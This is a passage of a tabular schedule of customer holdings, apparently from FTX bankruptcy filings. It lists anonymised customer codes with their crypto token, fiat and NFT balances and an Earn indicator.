(462084182784392860/DOGO-DE-500 #2678)[1], NFT (467648029427294201/ApexDucks Halloween #1023)[1], NFT (469876395316906283/Sigma Shark #4578)[1], NFT (471337747504781637/CryptoPet #9954)[1], NFT (477864741479483247/Inaugural Collection #370)[1], NFT (484354195325465439/FTX Crypto Cup 2022 Key #357)[1], NFT (484882690133817676/sheep_490)[1], NFT (484932745371630590/ApexDucks Halloween #920)[1], NFT (486258790121567648/Fancy Frenchies #3173)[1], NFT (487762383171834273/Kiddo #6770)[1], NFT (496062823146188207/Careless Cat #287)[1], NFT (496454404442762031/ApexDucks Halloween #519)[1], NFT (504598406239546919/Geraldine1049)[1], NFT (504932740344258055/FTX Crypto Cup 2022 Key #781)[1], NFT (507078000688085101/Solana Islands #760)[1], NFT (510117501247615473/GalaxyKoalas # 398)[1], NFT (510200960527724044/Sigma Shark #2346)[1], NFT (515039365719978794/FTX EU - we are here! #52982)[1], NFT (519130169289838084/Fancy Frenchies #6804)[1], NFT (519487281240943485/The Hill by FTX #1834)[1], NFT (521336192761355971/ApexDucks #5023)[1], NFT (525572998566414710/Highland Mesa #279)[1], NFT (526468467049196300/Megalodon Rogue Shark Tooth)[1], NFT (526878992491362761/The Hill by FTX #2569)[1], NFT (529278473500205616/Anti Social Bot #3439)[1], NFT (534325111884860026/Sigma Shark #1659)[1], NFT (539669606647714057/Sigma Shark #124)[1], NFT (543079005223163967/Sigma Shark #5425)[1], NFT (545272716137338021/Sigma Shark #3011)[1], NFT (545473202240870036/Fancy Frenchies #1416)[1], NFT (547206243489282934/Sigma Shark #5344)[1], NFT (548854298454769909/The Tower #272-11)[1], NFT (549034164449187583/GalaxyKoalas # 270)[1], NFT (552852633712415885/Oink 1376)[1], NFT (555555788904346938/Sigma Shark #1410)[1], NFT (555820661899715871/APEFUEL by Almond Breeze #603)[1], NFT (557616480149234994/FTX Crypto Cup 2022 Key #779)[1], NFT (561345450234996703/ApexDucks Halloween #108)[1], NFT (568399205031018387/APEFUEL by Almond Breeze #549)[1], NFT (572655780539673340/Geraldine1053)[1], NFT (574013673929181904/Astral Apes #727)[1], NFT (574929218738752226/Planet Sea Dragon)[1], NFT (575196424459698507/FTX AU - we are here! #56748)[1], SHIB[34], SOL[.01953958], TRX[1], UNI[.70992732], USD[29.21], USDT[0] | Yes | |
| 07367485 | | USD[10.00] | | |
| 07367487 | | DOGE[.04], GRT[0], LINK[0], SOL[0], USD[0.00], USDT[0] | | |
| 07367488 | | BAT[4], BRZ[4], CUSDT[12], DOGE[0], GRT[1], LINK[58.91730732], TRX[4357.60909631], USD[16151.51], USDT[1] | | |
| 07367489 | | USD[10.00] | | |
| 07367490 | | BTC[0], DOGE[79.98019955], USD[0.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07367491 | | BRZ[1], BTC[.00621199], CUSDT[1], DOGE[6974.22225846], TRX[1], USD[594.28] | Yes | |
| 07367492 | | USD[10.00] | | |
| 07367493 | | AUD[0.00], BAT[0], BCH[0.00119063], BRZ[0.00000002], BTC[0.00001023], CAD[0.00], CUSDT[2], DAI[0], DOGE[3], ETH[0], ETHW[0], EUR[0.00], GBP[0.00], GRT[0], LINK[0.00056974], PAXG[0], SGD[0.00], SOL[0.00005802], SUSHI[0], TRX[0], UNI[0.00005181], USD[0.00], USDT[0.00000005], YFI[0.00002578] | | |
| 07367494 | | DOGE[32.61407559], USD[0.00] | | |
| 07367495 | | USD[1070.37] | Yes | |
| 07367496 | | USD[10.00] | | |
| 07367497 | | CUSDT[1], DOGE[1], USD[1.32], USDT[0] | | |
| 07367498 | | BRZ[1], CUSDT[3], SHIB[1], USD[0.00] | Yes | |
| 07367499 | | USD[0.01] | | |
| 07367500 | | CUSDT[2], DOGE[1], USD[0.01] | Yes | |
| 07367501 | | CUSDT[1], LTC[.05157743], USD[0.00] | | |
| 07367502 | | BAT[1.0165555], BCH[.0020397], BRZ[14.33981897], BTC[.00000574], CUSDT[120.23386419], DOGE[1156.78089921], ETH[.00009164], ETHW[.00009164], GRT[1.00481515], LTC[.00443263], TRX[24.26739397], USD[0.14], USDT[1.10306296] | Yes | |
| 07367503 | | USD[11.01] | Yes | |
| 07367504 | | USD[10.00] | | |
| 07367505 | | CUSDT[1], TRX[200.99492487], USD[10.00] | | |
| 07367506 | | USD[10.00] | | |
| 07367507 | | BAT[0], BCH[0], BRZ[0], BTC[0.00074539], CAD[0.00], DOGE[0], ETH[0.00000192], ETHW[0.00000192], EUR[0.00], GBP[0.00], GRT[0], LINK[0.0008285], LTC[0], MATIC[.00078429], SHIB[3.65264019], SOL[0.00005152], TRX[1.01017682], USD[1031.15], USDT[0] | Yes | |
| 07367508 | | BRZ[1], BTC[.00000025], CUSDT[2], ETH[0], ETHW[0], SHIB[2], TRX[1], USD[0.00] | Yes | |
| 07367509 | | BRZ[1], DOGE[2654.1945252], LTC[2.26950766], TRX[2012.87697468], USD[0.00] | | |
| 07367510 | | DOGE[132.37516389], USD[0.00] | Yes | |
| 07367511 | | DOGE[1.17949325], GRT[0], USD[0.00] | Yes | |
| 07367512 | | DOGE[139.94425932], UNI[2.31570983], USD[0.00] | | |
| 07367513 | | BTC[0.00054457], USD[0.00] | Yes | |
| 07367514 | | USD[0.01] | | |
| 07367516 | | USD[0.00] | | |
| 07367517 | | AAVE[0], BAT[0], BCH[0], BTC[0], DOGE[0], ETH[0], LINK[0], MKR[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], YFI[0] | Yes | |
| 07367518 | | CUSDT[1], DOGE[3076.7766555], USD[0.01], USDT[1] | | |
| 07367519 | | BTC[0], CUSDT[1], DOGE[0], USD[0.00] | Yes | |
| 07367520 | | USD[10.00] | | |
| 07367521 | | USD[10.00] | | |
| 07367522 | | CUSDT[1], USD[0.00] | | |
| 07367523 | | ETH[.00555152], ETHW[.00555152], USD[0.00] | | |
| 07367524 | | USD[10.00] | | |
| 07367525 | | USD[10.00] | | |
| 07367526 | | CUSDT[2], DOGE[5217.94197681], TRX[3758.45925031], USD[7.10], USDT[1.09657457] | Yes | |
| 07367527 | | USD[10.00] | | |
| 07367528 | | DOGE[0], ETH[0.00000668], ETHW[0.00000668], GRT[0], LTC[0], SUSHI[0], UNI[0], USD[0.00], USDT[0] | | |
| 07367529 | | DOGE[147.1872444], USD[0.00] | | |
| 07367530 | | BTC[0], DAI[0], LINK[.0876], SOL[.0044], SUSHI[.426], TRX[.94], UNI[.0348], USD[0.00] | | |
| 07367531 | | DOGE[29.25368296], USD[0.00] | | |
| 07367532 | | DOGE[815.04999489], USD[0.00] | Yes | |
| 07367533 | | DOGE[1], USD[0.01] | Yes | |
| 07367534 | | DOGE[1], ETH[.07935248], ETHW[.07935248], USD[10.00] | | |
| 07367535 | | USD[12.00] | | |
| 07367536 | | USD[10.00] | | |
| 07367537 | | CUSDT[2], DOGE[595.45971735], SOL[39.05212925], USD[0.00] | | |
| 07367538 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07367539 | | CUSDT[2], TRX[1], USD[0.01] | | |
| 07367540 | | USD[10.00] | | |
| 07367541 | | USD[10.00] | | |
| 07367542 | | USD[10.00] | | |
| 07367544 | | BRZ[2], CUSDT[5], DOGE[1538.72352183], GRT[1], TRX[6], USD[0.00] | | |
| 07367545 | | BRZ[1], ETH[0], USD[0.01] | | |
| 07367546 | | ETH[.00000118], ETHW[.00000118], USD[0.00] | | |
| 07367547 | | DOGE[15.43974692], USD[0.00] | | |
| 07367548 | | USD[10.00] | | |
| 07367549 | | USD[0.21] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07367550 | | USD[10.00] | | |
| 07367553 | | USD[10.00] | | |
| 07367554 | | USD[10.00] | | |
| 07367555 | | TRX[1], USD[0.00] | | |
| 07367556 | | BAT[1], BRZ[1], CUSDT[1], DOGE[2], USD[0.00] | | |
| 07367557 | | BTC[.00020377], DOGE[1], USD[0.00] | Yes | |
| 07367558 | | CUSDT[1], USD[0.00] | | |
| 07367559 | | DOGE[130.16458921], USD[0.00] | | |
| 07367560 | | BTC[0], CUSDT[3], EUR[0.00], TRX[2], USD[1.32], USDT[0] | | |
| 07367561 | | BAT[1.00730506], CUSDT[1], DAI[5.24205449], DOGE[43.1852737], LTC[.03455314], SOL[.00742704], USD[-6.36], USDT[.00278641] | Yes | |
| 07367562 | | CUSDT[1], DOGE[3485.15089763], USD[11.05] | Yes | |
| 07367563 | | USD[10.00] | | |
| 07367565 | | USD[10.00] | | |
| 07367566 | | BTC[0], CUSDT[1], DOGE[26.02530427], USD[0.00] | | |
| 07367569 | | CUSDT[1], USD[0.00] | | |
| 07367570 | | USD[10.00] | | |
| 07367571 | | BRZ[1], CUSDT[1], DOGE[2], ETH[0], SHIB[1], TRX[2], USD[0.00], USDT[0.00001752] | Yes | |
| 07367572 | | CUSDT[1], DOGE[399.99997822], TRX[2], USD[0.00] | | |
| 07367573 | | DOGE[1], USD[0.00] | | |
| 07367574 | | USD[0.00], USDT[0] | | |
| 07367575 | | USD[10.00] | | |
| 07367576 | | USD[10.00] | | |
| 07367577 | | BRZ[1], CUSDT[3], DOGE[0], TRX[3], USD[0.00] | | |
| 07367578 | | CUSDT[1], DOGE[1.48911873], USD[0.20] | | |
| 07367579 | | DOGE[186.77303266], USD[0.00] | | |
| 07367580 | | CUSDT[1], GRT[1], TRX[4], USD[0.00] | | |
| 07367581 | | CUSDT[1], DOGE[928.20980304], USD[0.00] | | |
| 07367582 | | DOGE[1], USD[11.33] | | |
| 07367583 | | USD[10.00] | | |
| 07367584 | | CUSDT[3], DOGE[1], ETH[.00009875], ETHW[.00009875], USD[0.00] | | |
| 07367585 | | USD[0.00], USDT[0] | | |
| 07367586 | | USD[10.00] | | |
| 07367587 | | USD[10.00] | | |
| 07367588 | | USD[10.00] | | |
| 07367589 | | BTC[.00003976], CUSDT[19], SOL[.00000095], TRX[4], USD[0.00] | | |
| 07367590 | | DOGE[46.47104980], USD[0.00] | Yes | |
| 07367591 | | DOGE[1837.259], USD[1.92] | | |
| 07367593 | | USD[10.00] | | |
| 07367594 | | BAT[.00000144], CUSDT[1], DOGE[.0000547], TRX[2.00000965], UNI[.00072111], USD[0.01] | | |
| 07367595 | | USD[0.00] | | |
| 07367596 | | USD[10.00] | | |
| 07367597 | | CUSDT[1], DOGE[18.32926662], USD[0.60] | Yes | |
| 07367598 | | BTC[.00010024], SOL[.31557493], SUSHI[.12109831], USD[0.00] | | |
| 07367599 | | CUSDT[2], DOGE[74.62384987], USD[0.24] | | |
| 07367601 | | BAT[1], CUSDT[2], DOGE[314685.94654724], GRT[1], TRX[1], USD[10.00] | | |
| 07367602 | | CUSDT[3], DOGE[.00107315], USD[0.00], USDT[1] | | |
| 07367603 | | BAT[0], BCH[0], BTC[0], DOGE[.00004504], EUR[0.00], LTC[0], USD[0.00] | | |
| 07367604 | | USD[10.00] | | |
| 07367605 | | DOGE[1107.39443727], TRX[1.00004776], USD[0.00] | Yes | |
| 07367607 | | CUSDT[1], TRX[163.12903761], USD[0.00], USDT[1] | | |
| 07367608 | | USD[10.00] | | |
| 07367609 | | BRZ[6], CUSDT[11], DOGE[1], ETH[0], SUSHI[237.62060315], USD[0.00] | | |
| 07367610 | | USD[10.00] | | |
| 07367611 | | USD[10.00] | | |
| 07367612 | | USD[10.00] | | |
| 07367613 | | USD[10.00] | | |
| 07367614 | | USD[10.00] | | |
| 07367615 | | CUSDT[1], DOGE[24.63512627], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07367616 | | BTC[0], CUSDT[1], DOGE[0], TRX[1], USD[0.00] | | |
| 07367617 | | USD[10.00] | | |
| 07367618 | | USD[10.00] | | |
| 07367619 | | USD[10.00] | | |
| 07367620 | | DOGE[18.27616305], USD[0.00] | | |
| 07367622 | | USD[10.00] | | |
| 07367623 | | USD[10.00] | | |
| 07367624 | | USD[10.00] | | |
| 07367625 | | USD[10.00] | | |
| 07367626 | | CUSDT[2], USD[0.00] | | |
| 07367627 | | SOL[.0004956], USD[0.00] | Yes | |
| 07367628 | | USD[0.01] | | |
| 07367630 | | CUSDT[3], TRX[1], USD[0.01] | | |
| 07367631 | | USD[10.00] | | |
| 07367632 | | CUSDT[4], DOGE[0.00000653], USD[0.00] | Yes | |
| 07367633 | | USD[10.00] | | |
| 07367634 | | BRZ[1], DOGE[32352.56721665], TRX[1], USD[0.00] | Yes | |
| 07367636 | | DOGE[42.83301318], USD[0.00] | | |
| 07367637 | | CUSDT[2], DOGE[.00199098], NFT (41695477184399067/Machitto #5)[1], NFT (570487316720704429/Echo #19)[1], SHIB[3440039.0685302], TRX[1], USD[0.01] | | |
| 07367639 | | USD[10.86] | Yes | |
| 07367640 | | CUSDT[1], DOGE[126.07214907], USD[0.00] | | |
| 07367641 | | BAT[0], CUSDT[1], DOGE[1], GRT[52.76074414], SHIB[273055.18510548], SOL[0], TRX[179.34387068], USD[7.65] | Yes | |
| 07367643 | | CUSDT[1], DOGE[85.19867299], USD[0.00] | | |
| 07367644 | | CUSDT[4], DOGE[.01618121], ETH[.00444352], ETHW[.0043888], TRX[.0000913], USD[0.00] | Yes | |
| 07367645 | | BAT[1], BTC[.02086361], DOGE[3912.49664011], TRX[1], USD[0.00] | | |
| 07367647 | | USD[10.00] | | |
| 07367648 | | CUSDT[1], TRX[161.00440991], USD[0.00] | | |
| 07367649 | | DOGE[0], USD[0.00], USDT[10.05420932] | | |
| 07367650 | | USD[10.00] | | |
| 07367651 | | USD[10.00] | | |
| 07367652 | | DAI[0], ETH[.07983], ETHW[.07983], GRT[974.668], LINK[.0201], USD[4.54] | | |
| 07367653 | | BRZ[3], CUSDT[5], LINK[.00009405], TRX[2.00000918], USD[0.00], USDT[0] | Yes | |
| 07367654 | | USD[10.00] | | |
| 07367655 | | BAT[0], BTC[0], CUSDT[86.68157652], DOGE[179.87024038], GRT[0], USD[0.00] | | |
| 07367656 | | USD[10.00] | | |
| 07367657 | | CUSDT[3], DOGE[2240.06852468], KSHIB[23048.27348062], LINK[40.60237632], SOL[3.61372786], TRX[1], USD[2894.94] | Yes | |
| 07367658 | | USD[10.00] | | |
| 07367659 | | DOGE[0.30058539], USD[0.00] | Yes | |
| 07367661 | | USD[10.00] | | |
| 07367663 | | CUSDT[1], DOGE[202.91585248], USD[0.00] | | |
| 07367664 | | BAT[1], CUSDT[2], DOGE[9601.89213247], GRT[1], TRX[6], USD[0.00], USDT[2] | | |
| 07367665 | | TRX[1], USD[0.00] | Yes | |
| 07367666 | | GRT[1.17219472], USD[8.00] | | |
| 07367668 | | DOGE[1070.0790844], SHIB[3], USD[0.00] | Yes | |
| 07367669 | | BRZ[1], CUSDT[4], DOGE[1], GRT[1], USD[0.00] | | |
| 07367670 | | DOGE[75.60977582], USD[0.00] | | |
| 07367671 | | USD[10.00] | | |
| 07367672 | | CUSDT[1], DOGE[574.75034783], ETH[.01818911], ETHW[.01818911], USD[0.00] | | |
| 07367673 | | BAT[1.0165555], BRZ[9.87045968], BTC[.00000034], CUSDT[13], DOGE[.00904147], GRT[3.13227903], LINK[.00023548], SOL[23.89456424], SUSHI[.00002253], TRX[7], USD[2.12] | Yes | |
| 07367674 | | USD[10.00] | | |
| 07367675 | | USD[38.83] | | |
| 07367676 | | USD[10.00] | | |
| 07367677 | | DOGE[1], USD[0.01], USDT[0] | | |
| 07367678 | | CUSDT[1], DOGE[.19869807], TRX[2], USD[0.01] | Yes | |
| 07367679 | | USD[0.01], USDT[0] | | |
| 07367680 | | DAI[10.8776667], DOGE[2], SOL[9.14827976], SUSHI[3.42904276], USD[0.00] | Yes | |
| 07367681 | | USD[10.00] | | |
| 07367682 | | DOGE[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07367684 | | BRZ[0], GRT[0], LINK[0], TRX[1], USD[0.00] | | |
| 07367685 | | USD[0.29] | | |
| 07367687 | | BRZ[1], BTC[.00220995], CUSDT[775.8745083], DOGE[2172.85152492], ETH[.04064251], ETHW[.04013635], SHIB[414012.9179726], TRX[531.13518356], USD[0.20] | Yes | |
| 07367688 | | USD[10.00] | | |
| 07367689 | | BCH[0], BTC[0], CUSDT[3], DOGE[3.36676005], ETH[0], LTC[0], TRX[3.53173645], USD[0.01] | Yes | |
| 07367690 | | SOL[.38937392], USD[0.00] | | |
| 07367691 | | USD[10.00] | | |
| 07367692 | | USD[10.00] | | |
| 07367694 | | USD[10.00] | | |
| 07367695 | | USD[0.01] | | |
| 07367696 | | BAT[2], BRZ[2], BTC[0], CUSDT[5], DOGE[1224.14827570], USD[0.01] | | |
| 07367697 | | CUSDT[1], DOGE[2445.99787051], USD[10.00] | | |
| 07367698 | | DOGE[2021.45741799], USD[0.00] | | |
| 07367699 | | DOGE[.00001343], USD[0.00] | | |
| 07367701 | | DOGE[1.00003174], USD[0.00] | | |
| 07367702 | | CUSDT[2], USD[0.00] | | |
| 07367705 | | USD[10.00] | | |
| 07367706 | | BAT[33.22963271], BRZ[1], CUSDT[1], DOGE[4.55856942], ETH[.05069986], ETHW[.05007058], LINK[.00037318], SHIB[1], TRX[3], USD[0.00] | Yes | |
| 07367707 | | GRT[8.62408204], USD[0.00] | | |
| 07367708 | | USD[10.00] | | |
| 07367710 | | USD[10.00] | | |
| 07367711 | | CUSDT[4], DOGE[0], TRX[3], USD[0.00] | | |
| 07367712 | | DOGE[1], SUSHI[2.01853133], USD[0.00] | | |
| 07367713 | | DOGE[1270.896], SOL[114.2412], USD[3.40] | | |
| 07367714 | | DOGE[493.73534284], SOL[2.28823917], TRX[102.62089016], USD[0.00] | Yes | |
| 07367715 | | SOL[0], USD[0.00] | | |
| 07367716 | | TRX[462.12833018], USD[0.00] | Yes | |
| 07367717 | | DOGE[190.69667215], USD[0.00] | | |
| 07367718 | | SUSHI[.49401088], USD[0.00] | | |
| 07367719 | | SOL[.00663398], USD[0.00] | | |
| 07367720 | | USD[10.00] | | |
| 07367722 | | BRZ[1], CUSDT[2], DOGE[.05730713], TRX[720.93174555], USD[0.04] | Yes | |
| 07367724 | | USD[0.06] | | |
| 07367725 | | CUSDT[5], USD[0.30], USDT[0] | Yes | |
| 07367726 | | BTC[.00075439], DOGE[1483.55425606], USD[0.50] | Yes | |
| 07367727 | | CUSDT[4], TRX[1], USD[0.01] | | |
| 07367728 | | DOGE[15.6376627], SHIB[63709.52753923], USD[0.00] | | |
| 07367729 | | CUSDT[1], DOGE[1.08195699], SHIB[2264930.68721813], TRX[1], USD[0.01] | Yes | |
| 07367730 | | BAT[1.0165555], BRZ[2], CUSDT[6], DOGE[3324.23159314], TRX[1], USD[0.00] | Yes | |
| 07367731 | | USD[10.00] | | |
| 07367732 | | USD[0.00] | | |
| 07367733 | | USD[10.00] | | |
| 07367734 | | USD[0.00] | | |
| 07367735 | | USD[10.00] | | |
| 07367736 | | USD[10.00] | | |
| 07367737 | | USD[10.00] | | |
| 07367738 | | BTC[0], DOGE[0], SOL[0], USD[0.00], USDT[0] | | |
| 07367739 | | BRZ[1], CUSDT[6], USD[2.30] | | |
| 07367740 | | CUSDT[17], DOGE[2], ETH[.00000024], ETHW[.02623668], SHIB[2], TRX[3.00005908], USD[38.79] | Yes | |
| 07367741 | | USD[10.00] | | |
| 07367742 | | USD[10.00] | | |
| 07367743 | | BRZ[1], DOGE[8202.55068485], SHIB[6199628.02231866], TRX[1], USD[0.00] | | |
| 07367744 | | BRZ[1], CUSDT[2], DOGE[.06427065], USD[0.01] | | |
| 07367745 | | USD[10.00] | | |
| 07367746 | | BCH[.0780401], BTC[.00283154], CUSDT[4], DOGE[410.98054915], ETH[0.06309103], ETHW[0.06230906], LTC[1.02326961], NFT (290971128246902814/ISO 3D Series #1 #3)[1], NFT (371810195671460056/Symphony#6)[1], SHIB[1], TRX[321.91819756], USD[9.68] | Yes | |
| 07367747 | | BRZ[1], CUSDT[2], DOGE[2], TRX[2], USD[0.00] | Yes | |
| 07367748 | | BAT[1], CUSDT[7], DOGE[19.72120734], LINK[.5195444], SHIB[551605.92748039], TRX[23.47962189], USD[0.01] | Yes | |
| 07367749 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07367750 | | DOGE[15.44036174], USD[0.00] | | |
| 07367751 | | BCH[.00004104], BRZ[1], BTC[.00000725], DOGE[2.94629094], ETH[0.00102194], ETHW[0.00100826], LINK[.00978519], MATIC[0], PAXG[.00033044], SOL[0.00000060], TRX[8.00431693], USD[0.02] | Yes | |
| 07367752 | | USD[10.00] | | |
| 07367753 | | DOGE[196.500354], EUR[0.00], USD[0.00] | Yes | |
| 07367754 | | USD[10.00] | | |
| 07367755 | | USD[10.00] | | |
| 07367756 | | USD[10.00] | | |
| 07367757 | | USD[10.00] | | |
| 07367758 | | BRZ[1], CUSDT[5], USD[0.50] | | |
| 07367759 | | DOGE[20.13282191], SUSHI[.00011072], USD[0.00] | | |
| 07367760 | | CUSDT[1], USD[0.00] | | |
| 07367761 | | USD[10.55] | Yes | |
| 07367763 | | BCH[.02011797], BTC[.00098454], DOGE[783.5699082], SOL[1.72567061], SUSHI[1.29829423], USD[0.68] | | |
| 07367764 | | DOGE[1229.42757506], TRX[1], USD[0.00] | | |
| 07367765 | | BRZ[1], BTC[0.00000128], DOGE[2], ETH[0], SHIB[2], TRX[78.36707326], USD[0.00] | Yes | |
| 07367766 | | CUSDT[2], DOGE[21.02611785], TRX[1], USD[0.00] | | |
| 07367767 | | BTC[0.00053029], DOGE[750.97596395], USD[0.00] | Yes | |
| 07367768 | | USD[0.01] | | |
| 07367769 | | BTC[.00025437], CUSDT[2], DOGE[6543.34454942], TRX[1], USD[0.00] | | |
| 07367770 | | DOGE[116.33104703], USD[3963.99] | | |
| 07367771 | | BAT[3], CUSDT[44], GRT[1], USD[0.00], USDT[0] | | |
| 07367772 | | USD[10.00] | | |
| 07367773 | | USD[10.00] | | |
| 07367774 | | BTC[.00042866], DOGE[435.27096397], USD[0.00] | | |
| 07367775 | | CUSDT[1], DOGE[200.53804994], USD[0.00] | | |
| 07367776 | | USD[10.00] | | |
| 07367777 | | SOL[.6283338], USD[0.00] | | |
| 07367778 | | DOGE[20.16233624], USD[0.00] | | |
| 07367779 | | USD[10.00] | | |
| 07367780 | | USD[10.00] | | |
| 07367781 | | USD[10.00] | | |
| 07367782 | | CUSDT[3], TRX[1], USD[0.00] | | |
| 07367783 | | BRZ[4], BTC[.08524994], CUSDT[7], DOGE[4222.14394378], PAXG[.00577891], SUSHI[4.84328728], TRX[2], USD[0.00], USDT[1.10668695] | Yes | |
| 07367784 | | USD[0.00] | Yes | |
| 07367786 | | BRZ[2], BTC[.00010278], CUSDT[2], DAI[1.98464941], DOGE[703.11195317], SOL[.00000094], TRX[1], USD[0.00], USDT[1.98901346] | | |
| 07367788 | | ETH[0], TRX[1], USD[0.00] | Yes | |
| 07367789 | | USD[10.00] | | |
| 07367790 | | USD[10.00] | | |
| 07367792 | | DOGE[3801.05046467], USD[0.00] | | |
| 07367793 | | BRZ[1], CUSDT[1], TRX[2], USD[0.01] | | |
| 07367794 | | LINK[.00000023], USD[0.00] | Yes | |
| 07367796 | | DOGE[36.24712229], USD[0.00] | | |
| 07367797 | | BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], USD[0.01], USDT[0] | | |
| 07367798 | | DOGE[701.43745752], USD[59.00] | | |
| 07367799 | | DOGE[3], USD[0.01] | | |
| 07367800 | | USD[10.00] | | |
| 07367801 | | DOGE[153.45055738], GRT[1], USD[0.00] | | |
| 07367802 | | DOGE[3138.37829266], GRT[380.74608335], SHIB[1], USD[0.00], USDT[0] | Yes | |
| 07367803 | | USD[10.00] | | |
| 07367804 | | CUSDT[3], ETH[0.05262344], ETHW[0.05262344], USD[0.11] | | |
| 07367805 | | CUSDT[1], DOGE[.85915373], USD[73.15] | | |
| 07367806 | | USD[10.00] | | |
| 07367807 | | CUSDT[1], DOGE[373.73554024], SOL[1], TRX[.52132336], USD[0.70] | | |
| 07367808 | | CUSDT[1], DOGE[0], USD[0.01], USDT[0] | | |
| 07367809 | | BAT[1.0165555], BRZ[1], CUSDT[524.13534464], TRX[.85837954], USD[0.04], USDT[1.09058249] | Yes | |
| 07367810 | | USD[10.00] | | |
| 07367811 | | NFT [359486103248523569/Pop Art #24][1], NFT [512466056168636250/Gold Objects #3][1], NFT [575822584245355031/Abstract #5][1], SHIB[1232952.23470625], USD[0.00] | Yes | |
| 07367812 | | CUSDT[1], SHIB[0], USD[0.00], USDT[0.00000001] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07367813 | | SOL[1.03561245], USD[0.00] | | |
| 07367814 | | CUSDT[2], DOGE[1076.19338932], SHIB[688368.89194769], USD[0.00] | | |
| 07367815 | | USD[10.92] | Yes | |
| 07367816 | | BRZ[26.892], BTC[0], USD[0.00] | | |
| 07367817 | | USD[3.18] | | |
| 07367818 | | USD[10.00] | | |
| 07367819 | | ALGO[72.07238258], PAXG[.00510771], TRX[1.00014349], USD[0.00] | Yes | |
| 07367820 | | GRT[2.30754305], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07367821 | | USD[10.00] | | |
| 07367823 | | DOGE[1], LTC[.0283412], USD[0.00] | | |
| 07367824 | | CUSDT[1], TRX[208.56436181], USD[0.00] | | |
| 07367825 | | CUSDT[1], DOGE[.00097034], USD[0.00] | | |
| 07367826 | | USD[10.00] | | |
| 07367827 | | CUSDT[.00329733], DOGE[722.67803197], USD[0.95] | | |
| 07367828 | | USD[10.00] | | |
| 07367829 | | DOGE[1], USD[0.00] | | |
| 07367830 | | CUSDT[13], DOGE[11.64860157], USD[0.22] | Yes | |
| 07367831 | | USD[10.00] | | |
| 07367833 | | TRX[2], USD[0.00] | | |
| 07367834 | | BRZ[2], DOGE[3], DOGE[1.00002791], SOL[12.05135295], TRX[4], USD[0.01] | | |
| 07367835 | | DOGE[49005.6975294], TRX[2], USD[0.00], USDT[1.10916898] | Yes | |
| 07367836 | | USD[0.00] | | |
| 07367838 | | USD[10.00] | | |
| 07367839 | | BRZ[1], DOGE[.0005803], USD[0.00] | | |
| 07367840 | | BRZ[1], DOGE[1], ETH[0], USD[0.00] | Yes | |
| 07367841 | | DOGE[4.98474199], SHIB[1], SOL[1.01371877], USD[0.58] | Yes | |
| 07367842 | | USD[10.00] | | |
| 07367843 | | BTC[0], CUSDT[2], DOGE[0], GRT[0], MATIC[0], SOL[0], TRX[0], UNI[0], USD[0.00] | Yes | |
| 07367844 | | CUSDT[8], TRX[1], USD[0.00] | | |
| 07367845 | | USD[10.00] | | |
| 07367846 | | USD[10.00] | | |
| 07367848 | | USD[10.00] | | |
| 07367850 | | BTC[.00007462], CUSDT[1.00076979], DOGE[2.45112002], USD[0.00] | | |
| 07367851 | | CUSDT[22], TRX[4], USD[0.00] | | |
| 07367853 | | USD[10.00] | | |
| 07367854 | | CUSDT[1], DOGE[131.86879845], USD[0.00] | | |
| 07367855 | | USD[0.01], USDT[0] | | |
| 07367857 | | USD[10.00] | | |
| 07367858 | | USD[0.00] | | |
| 07367859 | | CUSDT[4], TRX[1], USD[0.03] | | |
| 07367860 | | DOGE[126.70834526], USD[0.00] | | |
| 07367861 | | LTC[.49713132] | | |
| 07367862 | | BCH[.000036], BTC[0], SUSHI[.338], USD[1.22] | | |
| 07367863 | | USD[10.00] | | |
| 07367864 | | BAT[1], BRZ[3], CUSDT[6], DOGE[2326.34033251], TRX[2], USD[0.00] | | |
| 07367865 | | BRZ[1], BTC[.00295731], DOGE[2.90345519], TRX[1], USD[66.76], USDT[1] | | |
| 07367866 | | USD[10.00] | | |
| 07367867 | | BAT[1.0158409], BRZ[1], CUSDT[9], DOGE[5691.34341284], GRT[1.00262439], TRX[3], USD[0.96], USDT[1.08477158] | Yes | |
| 07367868 | | USD[10.00] | | |
| 07367869 | | CUSDT[2], DOGE[663.43141292], KSHIB[1640.92762294], SHIB[325203.25203252], USD[2.73] | | |
| 07367870 | | CUSDT[2], SHIB[3], USD[0.00], USDT[0] | | |
| 07367871 | | USD[4.61] | | |
| 07367872 | | USD[0.00] | | |
| 07367873 | | USD[0.00] | | |
| 07367874 | | BAT[0], USD[0.00] | | |
| 07367875 | | DOGE[2], TRX[1], USD[0.01] | | |
| 07367876 | | USD[0.01] | | |
| 07367877 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Coin / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07367878 | | BRZ[2], BTC[.01188673], CUSDT[6], ETH[.00253406], ETHW[.00250668], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07367879 | | USD[10.00] | | |
| 07367880 | | USD[0.18] | | |
| 07367881 | | DOGE[197.73459134], TRX[1], USD[0.00] | Yes | |
| 07367883 | | USD[10.00] | | |
| 07367884 | | BTC[.00021404], TRX[1], USD[0.00] | Yes | |
| 07367885 | | USD[10.00] | | |
